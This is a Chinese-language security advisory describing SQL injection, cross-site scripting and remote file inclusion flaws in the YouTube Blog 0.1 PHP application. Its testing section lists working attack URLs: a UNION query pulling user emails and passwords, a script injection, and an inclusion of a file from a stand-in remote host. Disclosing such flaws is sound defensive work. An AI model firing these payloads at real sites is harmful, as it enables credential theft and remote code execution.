发布日期：2008-07-22
更新日期：2008-07-23

受影响系统：

Carlos Desseno YouTube Blog 0.1

描述：

---

BUGTRAQ  ID: 30345

YouTube Blog是包含有有关YouTube新闻及社区内容的网络博客。

YouTube Blog中存在多个输入验证错误，允许远程攻击者通过跨站脚本或SQL注入攻击泄露敏感信息或入侵有漏洞的系统。

1) info.php和todos.php文件中没有正确验证对id参数的输入便用在了SQL查询中，允许远程攻击者执行SQL注入攻击。

2) mensaje.php文件没有正确地验证对m参数的输入便返回给了用户，允许远程攻击者在用户浏览器会话中注入并执行任意HTML和脚本代码。

3) cuenta/cuerpo.php文件中没有正确地验证对base_archivo参数的输入便用于包含文件，允许远程攻击者包含本地或外部资源的任意文件。成功利用这个漏洞要求打开了register_globals。

<*来源：unohope （unohope@chroot.org）
  
  链接：http://secunia.com/advisories/31161/
        http://milw0rm.com/exploits/6117
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

http://victim/ytb/todos.php?id=-99+union+select+1,2,mail,contrasena,5,6,7+from+ytb_usuarios+where+id=1/*
http://victim/ytb/mensaje.php?m=<script>alert(/xss/)</script>
http://victim/ytb/cuenta/cuerpo.php?base_archivo=http://192.168.1.111/blah.txt

建议：

---

厂商补丁：

Carlos Desseno
--------------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://youtubeblog.sourceforge.net/

浏览次数：2497
严重程度：0（网友投票）